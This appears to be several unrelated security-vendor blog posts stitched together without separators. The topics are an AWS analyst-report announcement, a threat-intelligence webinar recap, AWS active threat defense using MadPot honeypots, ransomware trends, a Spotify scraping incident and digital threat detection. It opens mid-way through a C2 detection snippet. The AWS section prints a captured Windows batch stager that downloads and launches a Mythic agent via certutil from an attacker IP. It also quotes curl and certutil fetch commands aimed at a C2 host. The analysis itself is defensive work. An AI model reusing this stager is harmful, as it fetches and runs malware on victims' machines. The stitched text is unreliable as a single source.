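# compare fingerprints against a baseline taken from a clean appliance image.
WATCHED_FILE = Path("/data/web/euq_webui/htdocs/index.py")
C2_IPS = {"172.233.67.176", "172.237.29.147", "38.54.56.95"}

def file_fingerprint(path):
    """SHA-256 of a watched file, or None if it is absent."""
    p = Path(path)
    if not p.is_file():
        return None
    return hashlib.sha256(p.read_bytes()).hexdigest()

def flag_c2_connections(netstat_lines):
    """Flag netstat-style output lines whose remote peer is a known C2 address."""
    return [ln for ln in netstat_lines
            if any(ip in ln for ip in C2_IPS)]
```

A fingerprint that differs from the baseline, or any hit on the C2 list (including the inactive address, for historical log review), warrants escalation to incident response.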
For the third year in a row, Amazon Web Services (AWS) is named as a Leader in the Information Services Group (ISG) Provider Lens™ Quadrant report for Sovereign Cloud Infrastructure Services (EU), published on January 9, 2026. ISG is a leading global technology research, analyst, and advisory firm that serves as a trusted business partner to more than 900 clients. This ISG report evaluates 19 providers of sovereign cloud infrastructure services in the multi-public-cloud environment and examines how they address the key challenges that enterprise clients face in the European Union (EU). ISG defines Leaders as providers who represent innovative strength and competitive stability.
ISG rated AWS ahead of other leading cloud providers on both the competitive strength and portfolio attractiveness axes, with the highest score on portfolio attractiveness. Competitive strength was assessed on multiple factors, including degree of awareness, core competencies, and go-to-market strategy. Portfolio attractiveness was assessed on multiple factors, including scope of portfolio, portfolio quality, strategy and vision, and local characteristics.
According to ISG, “AWS’s infrastructure provides robust resilience and availability, supported by a sovereign-by-design architecture that ensures data residency and regional independence.”
Read the report to:
Discover why AWS was named as a Leader with the highest score on portfolio attractiveness by ISG.
Gain further understanding on how the AWS Cloud is sovereign-by-design and how it continues to offer more control and more choice without compromising on the full power of AWS.
Learn how AWS is delivering on its Digital Sovereignty Pledge and is investing in an ambitious roadmap of capabilities for data residency, granular access restriction, encryption, and resilience.
AWS’s recognition as a Leader in this report for the third consecutive year underscores our commitment to helping European customers and partners meet their digital sovereignty and resilience requirements. We are building on the strong foundation of security and resilience that has underpinned AWS services, including our long-standing commitment to customer control over data residency, our design principle of strong regional isolation, our deep European engineering roots, and more than a decade of experience operating multiple independent clouds for the most critical and restricted workloads.
Intelligence drives better decisions. High-performing teams use threat intelligence not just for detection, but to inform strategic business decisions and communicate risk to leadership.
Maturity means efficiency. Advanced programs focus on automation, high-fidelity indicators, and cross-functional collaboration—freeing analysts to concentrate on strategic initiatives.
Information overload is the top challenge. Teams need better integrations and AI-powered tools to transform massive data volumes into actionable insights.
AI will reshape the analyst role. While junior analysts won't be replaced, their workflows will evolve significantly as AI augments their capabilities.
Recorded Future recently hosted two webinars to unpack key insights from the 2025 State of Threat Intelligence Report and hear directly from customers who are putting these findings into practice.
Based on survey responses from 615 cybersecurity executives and practitioners, the report showed clear industry trends. Threat intelligence spending is up, with 76% of organizations spending over $250,000 annually and 91% planning to increase spending in 2026. Even more critically, 87% said they expect to advance the maturity of their threat intelligence programs over the next two years.
But what does maturity actually look like in practice? Our customers offered candid perspectives on how they're turning intelligence into impact.
Intelligence as a strategic asset
Our webinar panelists noted that the availability of rich threat intelligence has transformed how their organizations approach decision-making. According to Jack Watson, Senior Threat Intelligence Analyst at Global Payments, “Understanding that one alert opened and one alert closed does not necessarily equate to one single adversary being stopped” has led his team to take “a much more holistic approach to looking at problems.”
Omkar Nimbalkar, Senior Manager of Cyber Threat Research and Intelligence at Adobe, said, “Once you start doing this work day in and day out, you uncover patterns in your environment. You uncover what your posture looks like, where your true risk resides, and you can use that as a means to inform the business on the changing threat landscape for better decision-making.”
Ryan Boyero, Recorded Future’s Senior Customer Success Manager, said context and storytelling are key benefits of threat intelligence. “You can have a precursor or malicious activity that has occurred,” he said, “but without threat intelligence, you can’t really tell the story or paint the picture to deliver to senior leadership in order to help make the best and informed decisions possible.”
How threat intelligence delivers organization-wide value
Nimbalkar said his team provides tailored threat intelligence to business units and product teams across Adobe so they can monitor for specific behavioral activities and block specific threats in their environments.
Boyero shared that Recorded Future customers in EMEA use threat intelligence to educate leadership. “We're able to inform leaders,” he said. “We're able to speak with executives, get them in the room, not so much scare them that a situation could happen or has happened, but ultimately just educate and let them know that this is what Recorded Future is able to do and how we can bring success to the table.”
Erich Harbowy, Security Intelligence Engineer at Superhuman, said that in addition to educating leaders about risk, his team also uses threat intelligence to show the value of their work. “Not only am I using this very current news, I am also using the statistics that come along with that,” he said. “How much damage occurred during the first attack that was similar to this? And are [my adversaries] done? Are they coming back?”
Harbowy appreciates Recorded Future for providing those insights for postmortems and follow-ups with executives. “How do I prove my worth?” he said. “Give me the intel.”
The anatomy of a mature threat intelligence program
According to Nimbalkar, maturity comes when the foundational tactical and operational work is complete. He said that advancing a threat intelligence program is all about efficiency and optimization, including making sure you have high-fidelity indicators so your noise-to-signal ratio is reduced and you have higher-quality detections, understanding who your adversaries are and how they’re targeting you, getting in front of stakeholders and engaging with cross-functional teams, and collecting metrics on everything you do.
“Once you have figured out all these workflows, automated as much as you can, optimized and made it efficient, and then you focus more on risk reduction across the environment and more on strategic initiatives, that’s a very good maturation,” he said.
Jack Watson of Global Payments described threat intelligence maturity as the ability to ingest and action intelligence. “It’s never been easier to ingest data, but it’s also never been harder to sift through [that data]. So we’re seeing more mature organizations developing automated workflows, developing custom capabilities to do collection and action, and using AI in unique ways.”
Pathways to advancing maturity
Nick Rainho, Senior Intelligence Consultant at Recorded Future, said that the key to advancing maturity is having solid intelligence requirements. “Especially if you’re working with limited resources, go for the low-hanging fruit and ensure that the intelligence you’re pulling in is relevant to senior leadership’s priorities.”
Ryan Boyero agreed that maturity success is predicated on understanding leadership’s key requirements. “And then, how are we able to work towards that greater good and define success together?”
Top challenges for CTI teams
The panelists agreed that information overload is a critical challenge for today’s CTI teams. “More data is better than less,” said Watson, “but you have to be able to whittle it down or it’s useless.”
Nimbalkar said that with new tools in the market, advancements in AI, and the exponential growth in the volume of data, teams need vendors that can provide better integration to make data more actionable. And Rainho agreed, calling for better out-of-the-box integrations between intelligence tools so security teams can consume intelligence in the location and manner that works best for them.
Looking to the future of threat intelligence
When asked how they think the threat landscape will evolve and how technology will evolve with it, the panelists shared a number of predictions. They believe AI will enable CTI teams to fight AI-powered threats at scale. Third-party risk management will become an even more critical discipline for proactive defense. Digital threats will continue to outpace physical threats. And while junior analysts won’t be replaced by AI, their jobs will look very different as they use AI to augment their workflows.
Cyber threats are evolving faster than traditional security defenses can respond; workloads with potential security issues are discovered by threat actors within 90 seconds, with exploitation attempts beginning within 3 minutes. Threat actors are quickly evolving their attack methodologies, resulting in new malware variants, exploit techniques, and evasion tactics. They also rotate their infrastructure—IP addresses, domains, and URLs. Effectively defending your workloads requires quickly translating threat data into protective measures, which can be challenging when operating at internet scale. This post describes how AWS active threat defense for AWS Network Firewall can help to detect and block these potential threats to protect your cloud workloads.
Active threat defense detects and blocks network threats by drawing on real-time intelligence gathered through MadPot, the network of honeypot sensors used by Amazon to actively monitor attack patterns. Active threat defense rules treat speed as a foundational tenet, not an aspiration. When threat actors create a new domain to host malware or set up fresh command-and-control servers, MadPot sees them in action. Within 30 minutes of receiving new intelligence from MadPot, active threat defense automatically translates that intelligence into threat detection through Amazon GuardDuty and active protection through AWS Network Firewall.
Speed alone isn’t enough without applying the right threat indicators to the right mitigation controls. Active threat defense disrupts attacks at every stage: it blocks reconnaissance scans, prevents malware downloads, and severs command-and-control communications between compromised systems and their operators. This creates a multi-layered defense approach that can disrupt attacks even when they bypass some of the layers.
How active threat defense works
MadPot honeypots mimic cloud servers, databases, and web applications—complete with the misconfigurations and security gaps that threat actors actively hunt for. When threat actors take the bait and launch their attacks, MadPot captures the complete attack lifecycle against these honeypots, mapping the threat actor infrastructure, capturing emerging attack techniques, and identifying novel threat patterns. Based on observations in MadPot, we also identify infrastructure with similar fingerprints through wider scans of the internet.
Figure 1: Overview of active threat defense integration
Figure 1 shows how this works. When threat actors deliver malware payloads to MadPot honeypots, AWS executes the malicious code in isolated environments, extracting indicators of compromise from the malware’s behavior—the domains it contacts, the files it drops, the protocols it abuses. This threat intelligence feeds active threat defense’s automated protection: Active threat defense validates indicators, converts them to firewall rules, tests for performance impact, and deploys them globally to Network Firewall—all within 30 minutes. And because threats evolve, active threat defense monitors changes in threat actor infrastructure, automatically updating protection rules as threat actors rotate domains, shift IP addresses, or modify their tactics. Active threat defense adapts automatically as threats evolve.
Figure 2: Swiss cheese model
Active threat defense uses the Swiss cheese model of defense (shown in Figure 2)—a principle recognizing that no single security control is perfect, but multiple imperfect layers create robust protection when stacked together. Each defensive layer has gaps. Threat actors can bypass DNS filtering with direct IP connections, encrypted traffic defeats HTTP inspection, domain fronting or IP-only connections evade TLS SNI analysis. Active threat defense applies threat indicators across multiple inspection points. If threat actors bypass one layer, other layers can still detect and block them. When MadPot identifies a malicious domain, Network Firewall doesn’t only block the domain, it also creates rules that deny DNS queries, block HTTP host headers, prevent TLS connections using SNI, and drop direct connections to the resolved IP addresses. Similar to Swiss cheese slices stacked together, the holes rarely align—and active threat defense reduces the likelihood of threat actors finding a complete path to their target.
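The layered blocking described here can be illustrated with Suricata-compatible rules, the rule language Network Firewall uses. This is a hand-written sketch for one hypothetical domain, not the actual managed rules AWS deploys; the SIDs and resolved IPs are illustrative:

```python
# For one malicious domain, emit rules at four layers: DNS, HTTP Host header,
# TLS SNI, and direct-to-IP. If an attacker bypasses one layer (for example,
# by connecting straight to the IP), another layer still applies.
def layered_rules(domain, resolved_ips, sid=1000001):
    rules = [
        # Layer 1: deny DNS resolution of the domain
        f'drop dns $HOME_NET any -> any any (msg:"C2 DNS query {domain}"; '
        f'dns.query; content:"{domain}"; sid:{sid};)',
        # Layer 2: block HTTP requests carrying the domain in the Host header
        f'drop http $HOME_NET any -> any any (msg:"C2 HTTP host {domain}"; '
        f'http.host; content:"{domain}"; sid:{sid + 1};)',
        # Layer 3: block TLS handshakes whose SNI names the domain
        f'drop tls $HOME_NET any -> any any (msg:"C2 TLS SNI {domain}"; '
        f'tls.sni; content:"{domain}"; sid:{sid + 2};)',
    ]
    # Layer 4: drop direct connections to the resolved IPs (bypasses DNS entirely)
    for i, ip in enumerate(resolved_ips):
        rules.append(f'drop ip $HOME_NET any -> {ip} any '
                     f'(msg:"C2 IP {ip}"; sid:{sid + 3 + i};)')
    return rules
```

Each rule alone is a slice with holes; stacked together they approximate the Swiss cheese coverage the text describes.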
Disrupting the attack kill chain with active threat defense
Let’s look at how active threat defense disrupts threat actors across the entire attack lifecycle with this Swiss cheese approach. Figure 3 illustrates an example attack methodology—described in the following sections—that threat actors use to compromise targets and establish persistent control for malicious activities. Modern attacks require network communications at every stage—and that’s precisely where active threat defense creates multiple layers of defense. This attack flow demonstrates the importance of network-layer security controls that can intercept and block malicious communications at each stage, preventing successful compromise even when initial vulnerabilities exist.
Figure 3: An example flow of an attack scenario using an OAST technique
Step 0: Infrastructure preparation
Before launching attacks, threat actors provision their operational infrastructure. For example, this includes setting up an out-of-band application security testing (OAST) callback endpoint—a reconnaissance technique that threat actors use to verify successful exploitation through separate communication channels. They also provision malware distribution servers hosting the payloads that will infect victims, and command-and-control (C2) servers to manage compromised systems. MadPot honeypots detect this infrastructure when threat actors use it against decoy systems, feeding those indicators into active threat defense protection rules.
Step 1: Target identification
Threat actors compile lists of potential victims through automated internet scanning or by purchasing target lists from underground markets. They’re looking for workloads running vulnerable software, exposed services, or common misconfigurations. The MadPot honeypot system experiences more than 750 million such interactions with potential threat actors every day. New MadPot sensors are discovered within 90 seconds; this visibility reveals patterns that would otherwise go unnoticed. Active threat defense doesn’t stop reconnaissance but uses MadPot’s visibility to disrupt later stages.
Step 2: Vulnerability confirmation
The threat actor attempts to verify a vulnerability in the target workload, embedding an OAST callback mechanism within the exploit payload. This might take the form of a malicious URL like http://malicious-callback[.]com/verify?target=victim injected into web forms, HTTP headers, API parameters, or other input fields. Some threat actors use OAST domain names that are also used by legitimate security scanners, while others use more custom domains to evade detection. The following table lists 20 example vulnerabilities that threat actors tried to exploit against MadPot using OAST links over the past 90 days.
Commvault Command Center path traversal vulnerability
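Input scrubbing for this injection pattern can be sketched: scan request parameters for URLs whose host matches a known OAST domain. The domain list below is illustrative (it reuses the defanged example above, with brackets removed); real detection would rely on a curated, current feed:

```python
import re

# Illustrative OAST domain list; a real deployment would use a maintained feed.
KNOWN_OAST_DOMAINS = {"malicious-callback.com", "oast.example"}
URL_RE = re.compile(r'https?://([a-z0-9.-]+)', re.IGNORECASE)

def oast_callbacks(params):
    """Return the names of request parameters whose values embed a known OAST host.

    params: dict of parameter name -> submitted value (form field, header, etc.).
    """
    hits = []
    for name, value in params.items():
        for host in URL_RE.findall(value):
            # endswith() also catches per-target subdomains like abc123.oast.example
            if any(host.lower().endswith(d) for d in KNOWN_OAST_DOMAINS):
                hits.append(name)
                break
    return hits
```

Matching on domain suffix is deliberate: OAST services typically issue a unique subdomain per probe, so exact-host matching would miss most callbacks.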
Step 3: OAST callback
When vulnerable workloads process these malicious payloads, they attempt to initiate callback connections to the threat actor’s OAST monitoring servers. These callback signals would normally provide the threat actor with confirmation of successful exploitation, along with intelligence about the compromised workload, vulnerability type, and potential attack progression pathways. Active threat defense breaks the attack chain at this point. MadPot identifies the malicious domain or IP address and adds it to the active threat defense deny list. When the vulnerable target attempts to execute the network call to the threat actor’s OAST endpoint, Network Firewall with active threat defense enabled blocks the outbound connection. The exploit might succeed, but without confirmation, the threat actor can’t identify which targets to pursue—stalling the attack.
Step 4: Malware delivery preparation
After the threat actor identifies a vulnerable target, they exploit the vulnerability to deliver malware that will establish persistent access. The following table lists 20 vulnerabilities that threat actors tried to exploit against MadPot to deliver malware over the past 90 days:
Step 5: Malware delivery blocked
The compromised target attempts to download the malware payload from the threat actor’s distribution server, but active threat defense intervenes again. The malware hosting infrastructure—whether it’s a domain, URL, or IP address—has been identified by MadPot and blocked by Network Firewall. If malware is delivered through TLS endpoints, active threat defense has rules that inspect the Server Name Indication (SNI) during the TLS handshake to identify and block malicious domains without decrypting traffic. For malware not delivered through TLS endpoints or customers who have enabled the Network Firewall TLS inspection feature, active threat defense rules inspect full URLs and HTTP headers, applying content-based rules before re-encrypting and forwarding legitimate traffic. Without successful malware delivery and execution, the threat actor cannot establish control.
Step 6: Command and control connection
If malware had somehow been delivered, it would attempt to phone home by connecting to the threat actor’s C2 server to receive instructions. At this point, another active threat defense layer activates. In Network Firewall, active threat defense implements mechanisms across multiple protocol layers to identify and block C2 communications before they facilitate sustained malicious operations. At the DNS layer, Network Firewall blocks resolution requests for known-malicious C2 domains, preventing malware from discovering where to connect. At the TCP layer, Network Firewall blocks direct connections to C2 IP addresses and ports. At the TLS layer—as described in Step 5—Network Firewall uses SNI inspection and fingerprinting techniques—or full decryption when enabled—to identify encrypted C2 traffic. Network Firewall blocks the outbound connection to the known-malicious C2 infrastructure, severing the threat actor’s ability to control the infected workload. Even if malware is present on the compromised workload, it’s effectively neutralized by being isolated and unable to communicate with its operator. Similarly, threat detection findings are created in Amazon GuardDuty for attempts to connect to the C2, so you can initiate incident response workflows. The following table lists examples of C2 frameworks that MadPot and our internet-wide scans have observed over the past 90 days:
Command and control frameworks
Adaptix
AsyncRAT
Brute Ratel
Cobalt Strike
Covenant
Deimos
Empire
Havoc
Metasploit
Mirai
Mythic
Platypus
Quasar
Sliver
SparkRAT
XorDDoS
Step 7: Attack objectives blocked
Without C2 connectivity, the threat actor cannot steal data or exfiltrate credentials. The layered approach used by active threat defense means threat actors must succeed at every step, while you only need to block one stage to stop the activity. This defense-in-depth approach reduces risk even if some defense layers have vulnerabilities. You can track active threat defense actions in the Network Firewall alert log.
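Alert-log records are JSON in the Suricata EVE style. As a hedged sketch, a small parser can summarize each record for triage; the field names shown are the commonly seen ones and may vary with your logging configuration:

```python
import json

def summarize_alert(message):
    """Reduce one Network Firewall alert-log record to a one-line triage summary.

    Assumes the EVE-style layout: an "event" object containing "alert",
    "src_ip", and "dest_ip" fields. Missing fields degrade gracefully.
    """
    rec = json.loads(message)
    ev = rec.get("event", {})
    sig = ev.get("alert", {}).get("signature", "unknown signature")
    src = ev.get("src_ip", "?")
    dst = ev.get("dest_ip", "?")
    return f"{sig}: {src} -> {dst}"
```

Records can be pulled from whatever destination you configured for the firewall's alert log type (CloudWatch Logs, S3, or Kinesis Data Firehose) and fed through this summarizer to spot blocked C2 attempts quickly.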
Real attack scenario – Stopping a CVE-2025-48703 exploitation campaign
In October 2025, AWS MadPot honeypots began detecting an attack campaign targeting Control Web Panel (CWP)—a server management platform used by hosting providers and system administrators. The threat actor was attempting to exploit CVE-2025-48703, a remote code execution vulnerability in CWP, to deploy the Mythic C2 framework. While Mythic is an open source command and control platform originally designed for legitimate red team operations, threat actors also adopt it for malicious campaigns. The exploit attempts originated from IP address 61.244.94[.]126, which exhibited characteristics consistent with a VPN exit node.
To confirm vulnerable targets, the threat actor attempted to execute operating system commands by exploiting the CWP file manager vulnerability. MadPot honeypots received exploitation attempts like the following example using the whoami command:
While this specific campaign didn’t use OAST callbacks for vulnerability confirmation, MadPot observes similar CVE-2025-48703 exploitation attempts using OAST callbacks like the following example:
After the vulnerable systems were identified, the attack moved immediately to payload delivery. MadPot captured infection attempts targeting both Linux and Windows workloads. For Linux targets, the threat actor used curl and wget to download the malware:
When MadPot honeypots observe these exploitation attempts, they download the malicious payloads the same as vulnerable servers would. MadPot uses these observations to extract threat indicators at multiple layers of analysis.
Layer 1 – MadPot identified the staging URLs and underlying IP addresses hosting the malware:
Layer 2 – MadPot’s analysis of the malware revealed that the Windows batch file (SHA256: 6ec153a1...) contained logic to detect system architecture and download the appropriate Mythic agent:
@echo off
setlocal enabledelayedexpansion
set u64="hxxp://196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=w64&stage=true"
set u32="hxxp://196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=w32&stage=true"
set v="C:\Users\Public\350b0949tcp.exe"
del %v%
for /f "tokens=*" %%A in ('wmic os get osarchitecture ^| findstr 64') do (
set "ARCH=64"
)
if "%ARCH%"=="64" (
certutil.exe -urlcache -split -f %u64% %v%
) else (
certutil.exe -urlcache -split -f %u32% %v%
)
start "" %v%
exit /b 0
The Linux script (SHA256: bdf17b30...) supported x86_64, i386, i686, aarch64, and armv7l architectures:
Layer 3 – By analyzing these staging scripts and referenced infrastructure, MadPot identified additional threat indicators revealing Mythic C2 framework endpoints:
Health check endpoint: 196.251.116[.]232:7443 and vc2.b1ack[.]cat:7443
HTTP listener: 196.251.116[.]232:80 and vc2.b1ack[.]cat:80
Within 30 minutes of MadPot’s analysis, Network Firewall instances globally deployed protection rules targeting every layer of this attack infrastructure. Vulnerable CWP installations remained protected against this campaign because when the exploit tried to execute curl -fsSL -m180 hxxp://vc2.b1ack[.]cat:28571/slt or certutil.exe -urlcache -split -f hxxp://vc2.b1ack[.]cat:28571/swt, Network Firewall would have blocked both resolution of the vc2.b1ack[.]cat domain and connections to 196.251.116[.]232:28571 for as long as the infrastructure was active. The vulnerable application might have executed the exploit payload, but Network Firewall blocked the malware download at the network layer.
Even if the staging scripts somehow reached a target through alternate means, they would fail when attempting to download Mythic agent binaries. The architecture-specific URLs would have been blocked. If a Mythic agent binary was somehow delivered and executed through a completely different infection vector, it still could not establish command-and-control. When the malware attempted to connect to the Mythic framework’s health endpoint on port 7443 or the HTTP listener on port 80, Network Firewall would have terminated those connections at the network perimeter.
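AWS does not publish the contents of the active threat defense managed rule group, but the blocking behavior described above can be sketched in the Suricata-compatible rule format that Network Firewall supports. The SIDs, messages, and match logic below are illustrative assumptions, not the deployed rules:

```suricata
# Illustrative only: the real managed rules are AWS-maintained and not public.
# Block DNS resolution of the staging/C2 domain.
drop dns $HOME_NET any -> any any (msg:"Mythic staging domain query"; dns.query; content:"vc2.b1ack.cat"; nocase; endswith; sid:1000001; rev:1;)
# Block all traffic to the staging/C2 IP, covering ports 28571, 7443, and 80.
drop ip $HOME_NET any -> 196.251.116.232 any (msg:"Mythic staging/C2 host"; sid:1000002; rev:1;)
```

Rules like these act at the network layer, which is why they protect a workload even after the application-level exploit has already run.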
This scenario shows how the active threat defense intelligence pipeline disrupts different stages of threat activity. It is the Swiss cheese model in practice: even when one defensive layer (for example, OAST blocking) isn’t applicable, subsequent layers (blocking downloads of hosted malware, detecting network behavior from malware, identifying botnet infrastructure) provide overlapping protection. MadPot’s analysis of the attack reveals additional threat indicators at each layer, protecting customers at different stages of the attack chain.
For GuardDuty customers with unpatched CWP installations, this meant they would have received threat detection findings for communication attempts with threat indicators tracked by active threat defense. For Network Firewall customers using active threat defense, unpatched CWP workloads would have automatically been protected against this campaign even before this CVE was added to the CISA Known Exploited Vulnerabilities (KEV) catalog on November 4.
Conclusion
AWS active threat defense for Network Firewall uses MadPot intelligence and multi-layered protection to disrupt attacker kill chains and reduce the operational burden for security teams. With automated rule deployment, active threat defense creates multi-layered defenses within 30 minutes of new threats being detected by MadPot. Amazon GuardDuty customers automatically receive threat detection findings when workloads attempt to communicate with malicious infrastructure identified by active threat defense, while AWS Network Firewall customers can actively block these threats using the active threat defense managed rule group. To get started, see Improve your security posture using Amazon threat intelligence on AWS Network Firewall.
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.
Declining payments, evolving tactics: Ransomware groups made less money in 2025 despite a 47% increase in publicly reported attacks, pushing them to adopt new approaches to extract payment, namely, DDoS-as-a-Service offerings, insider recruitment, and gig worker exploitation.
Insider threats are rising: With stolen credentials, vulnerability exploitation, and phishing still dominating initial access, ransomware operators are increasingly turning to native English speakers to recruit corporate insiders—a trend likely to accelerate if layoffs continue into 2026.
Global expansion underway: Recorded Future predicts 2026 will mark the first year that new ransomware actors operating outside Russia outnumber those within it, reflecting the rapid globalization of the ransomware ecosystem.
The ransomware paradox: More attacks, less money
By most accounts, ransomware groups made less money in 2025 than in 2024, both in overall payments and average payment size. This occurred despite a significant increase in attack volume: according to Recorded Future Intelligence, publicly reported attacks rose to 7,200 in 2025 compared to 4,900 in 2024, demonstrating a 47% increase.
For context, Recorded Future classifies both encryption attacks and data theft attacks with an extortion component under the ransomware umbrella. While exact numbers are difficult to isolate, approximately 50% of all attacks we track fall into the data theft and extortion category.
This declining profitability is driving ransomware groups to expand and evolve their tactics. Here are three trends organizations should prepare for heading into 2026.
Trend 1: DDoS services return to the RaaS model
With affiliates earning less and many ransomware operators abandoning the Ransomware-as-a-Service (RaaS) model to operate independently, remaining RaaS operations must offer more value to attract and retain affiliates. One increasingly common differentiator: bundled DDoS services.
The newly formed Chaos ransomware group (distinct from the older group of the same name) exemplifies this trend, providing DDoS capabilities to all affiliates. While this tactic isn't new—for example, REvil previously offered similar services—it fell out of favor for a period. Now, with fewer ransom payments to share, RaaS operators are reintroducing premium services to maintain their affiliate networks.
What this means for defenders: Organizations should ensure their DDoS mitigation strategies account for attacks that may accompany ransomware incidents. The pressure tactics are becoming multi-pronged.
Trend 2: Insider recruitment attempts are accelerating
Stolen credentials, vulnerability exploitation, and phishing remain by far the most common initial access vectors for ransomware groups, with social engineering as a distant but growing fourth method. However, there has been a notable increase in ransomware groups working with native English speakers to recruit corporate insiders.
The most public example came earlier this year when a ransomware group attempted to recruit a reporter at the BBC. But this represents only the visible tip of a larger trend. Private reporting indicates that insider recruitment attempts increased significantly throughout 2025 and will likely continue growing, especially if workforce reductions at major companies persist into 2026.
What this means for defenders: Insider threat programs should be evaluated and strengthened. Employee awareness training should address the possibility of external recruitment attempts, and organizations should monitor for anomalous access patterns that could indicate insider-facilitated attacks.
Trend 3: Gig workers as unwitting attack vectors
According to a recent FBI advisory, ransomware groups have begun exploiting gig work platforms to carry out attacks when remote methods fail. In one documented case, an attacker successfully executed a social engineering help desk scam but couldn't install their tools remotely due to security controls. Their solution: recruiting a gig worker through a legitimate platform to physically enter corporate offices and steal data.
The gig worker was unaware they were working for hackers, believing they were performing a legitimate IT task. The targeted employee thought they were assisting someone from the help desk. While this attack vector remains rare, the accessibility and global reach of gig work platforms means other groups could replicate this approach with minimal effort.
What this means for defenders: Physical security protocols should account for social engineering scenarios involving legitimate-looking third parties. Verification procedures for on-site IT work deserve renewed scrutiny.
Looking ahead: One big prediction for 2026
The ransomware ecosystem has seen tremendous growth among actors and groups operating outside of Russia.
Recorded Future believes that 2026 will be the first year the number of new ransomware actors outside Russia exceeds those emerging within it. This doesn't indicate a decline in Russian-based operations; instead, it reflects how dramatically the global ransomware ecosystem has expanded.
The bottom line: Strengthen your ransomware defenses
Understanding emerging ransomware tactics is the first step toward defending against them. To stay ahead of threat actors and protect your organization:
Explore Recorded Future's Ransomware Mitigation Solution for end-to-end visibility into your ransomware exposure across the attack lifecycle.
Read our latest Insikt Group® research on ransomware trends, threat actor TTPs, and emerging attack vectors.
Hacktivist group Anna’s Archive claims to have scraped almost all of Spotify’s catalog and is now seeding it via BitTorrent, effectively turning a streaming platform into a roughly 300 TB pirate “preservation archive.”
“A while ago, we discovered a way to scrape Spotify at scale. We saw a role for us here to build a music archive primarily aimed at preservation.”
Spotify insists that the hacktivists obtained no user data. Still, the incident highlights how large‑scale scraping, digital rights management (DRM) circumvention, and weak abuse controls can turn major content platforms into high‑value targets.
Anna’s Archive claims it obtained metadata for around 256 million tracks and audio files for roughly 86 million songs, totaling close to 300 TB. Reportedly, this represents about 99.9% of Spotify’s catalog and roughly 99.6% of all streams.
Spotify says it has “identified and disabled the nefarious user accounts that engaged in unlawful scraping” and implemented new safeguards.
From a security perspective, this incident is a textbook example of how scraping can escalate beyond “just metadata” into industrial‑scale content theft. By combining public APIs, token abuse, rate‑limit evasion, and DRM bypass techniques, attackers can extract protected content at scale. If you can create or compromise enough accounts and make them appear legitimate, you can chip away at content protections over time.
The “Spotify scrape” will likely be framed as a copyright story. But from a security angle, it serves as a reminder: if a platform exposes content or metadata at scale, someone will eventually automate access to it, weaponize it, and redistribute it.
And hiding behind terms-and-conditions violations, which have never stopped criminals, is not an effective security control.
How does this affect you?
There is currently no indication that passwords, payment details, or private playlists were exposed. This incident is purely about content and metadata, not user databases. That said, scammers may still claim otherwise. Be cautious of messages alleging your account data was compromised and asking for your login details.
Some general Spotify security tips, to be on the safe side:
If you have reused your Spotify password elsewhere or shared your credentials, consider changing your password for peace of mind.
Regularly review active sessions on streaming services and revoke anything you do not recognize. Spotify does not offer per-device session management, but you can sign out of all devices via Account > Settings and privacy on the Spotify website.
Avoid unofficial downloaders, converters, or “Spotify mods” that ask for your login or broad OAuth permissions. These tools often rely on the same kind of scraping infrastructure—or worse, function as credential-stealing malware.
We don’t just report on threats – we help protect your social media
Digital threats now originate far beyond the perimeter. Identity exposure, brand impersonation, and attacker coordination across the open, deep, and dark webs create risks that traditional tools cannot detect early enough.
Context is the foundation of effective detection. Raw alerts and isolated indicators offer little clarity. Real-time intelligence turns noise into actionable insight.
Modern digital threat detection (DTD) requires visibility across the external digital environment. The earliest warning signs of ransomware, credential theft, and phishing campaigns appear long before internal alerts fire.
Analysts need automation to keep pace. High alert volumes and false positives overwhelm SOC teams. Automated enrichment, correlation, and prioritization significantly reduce investigation time and alert fatigue.
Recorded Future operationalizes intelligence at enterprise scale. The Intelligence Graph®, Digital Risk Protection, and deep SIEM/SOAR/EDR integrations deliver immediate context, organization-specific visibility, and unified detections, improving time-to-detect, time-to-contain, and overall resilience.
Why Digital Threat Detection Requires a New Approach
Today’s cyber threats evolve too quickly and appear across too many digital touchpoints for isolated tools or static detection rules to keep up. SOC teams must contend with:
High alert volumes from SIEM, EDR, cloud telemetry, identity systems, and external sources.
Evolving adversary techniques, including automated attacks and infrastructure that changes by the hour.
Expanding attack surfaces driven by SaaS adoption, third-party dependencies, social platforms, and cloud-native architectures.
Alert fatigue from manually sifting through noise to find high-risk signals.
As a result, organizations often struggle to distinguish meaningful threats from the constant noise of daily security events.
Digital threat detection (DTD) addresses this challenge by shifting focus from isolated internal signals to continuous identification, analysis, and prioritization of threats across an organization’s entire digital ecosystem. Unlike traditional perimeter-focused detection, which relies on firewalls, antivirus, and static rules, DTD recognizes that modern threats originate from external infrastructure, supply chains, cloud environments, identities, brand assets, and the open web.
The shift from reactive, point-in-time monitoring toward a proactive, intelligence-led model gives defenders the context they need to understand not just what is happening, but why it’s happening and what to do next. This article will serve as a comprehensive guide for security professionals, defining DTD and exploring the essential tools, methodologies, and practices required to build a proactive and intelligent security program.
Leaked credentials and account takeover attempts (stolen identities)
Compromised identities are now the most common entry point for attackers. Credentials harvested from stealer logs, breach dumps, or phishing toolkits often circulate online long before defenders know they’re exposed.
Brand impersonation, domain spoofing, and phishing campaigns
Attackers increasingly weaponize an organization’s public presence and create look-alike domains, fraudulent social profiles, or cloned websites to exploit user trust. These impersonation campaigns often serve as the launchpad for credential harvesting, malware delivery, and social engineering operations.
Vulnerability exploitation and zero-day threats in the external attack surface
Public-facing assets such as web applications, cloud workloads, exposed services, and third-party integrations are constantly probed for misconfigurations and unpatched vulnerabilities.
Dark web chatter and early warning signs of planned ransomware or DDoS attacks
Long before a ransomware deployment or DDoS attack hits production systems, signals often surface in underground communities. Threat actors discuss tools, trade access, or signal interest in specific industries and regions.
Why an Intelligence-Driven Approach is Better
For years, security programs centered their detection efforts on internal activity: log anomalies, endpoint alerts, authentication failures, and other signals that only appear after an attacker is already inside the environment. This approach is inherently reactive. It reveals what is happening within your systems, but not what is forming outside your walls or who may be preparing to target you next.
Digital threat detection reverses that model. Instead of waiting for internal symptoms of compromise, it looks outward at the behaviors, infrastructure, and intent of adversaries operating across the broader digital ecosystem. This expanded perspective allows teams to identify threats earlier in the kill chain, sometimes before any malicious activity reaches corporate networks.
The real advantage comes from context. Raw data on its own is ambiguous: an IP address, a file hash, a domain registration. With intelligence layered on top, those fragments become meaningful. Context exposes intent, and intent enables defenders to prioritize, escalate, or respond with precision rather than guesswork.
